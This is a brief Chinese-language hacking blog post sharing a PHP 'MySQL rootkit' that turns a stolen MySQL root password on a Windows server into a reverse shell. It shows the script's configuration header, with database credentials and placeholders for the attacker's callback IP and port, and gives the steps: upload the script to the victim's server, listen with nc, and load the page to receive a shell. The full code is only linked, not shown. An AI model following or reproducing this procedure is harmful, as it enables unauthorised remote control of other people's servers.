MySQL Rootkit 反弹Shell

  • 发表于
  • 日志

渗透时,root密码之后却迷茫了,我当初就迷茫过。用这个感觉不错,分享下!

/*************************************
** Mysql function exp (only for win)
** 得到一个反向连接的*****
*************************************
*/
//mysql设置
$host='localhost';
$user='root';
$pass='111111';
$gt_db='库名';
//*****设置
$chost='你的IP';
$cport='端口';
...........................

首先修改这几个东西,不多说了。

然后把这个PHP脚本放到他的服务器上,nc监听端口,在IE里访问这个PHP就可以了(用FF或者TT的别多嘴,访问了就ok。我比较保守,还用IE6呢···),反弹一个*****

不做测试了,没有截图

因为代码很长所以不直接贴出来了,打包了,

下载地址:
Mysqlrootkit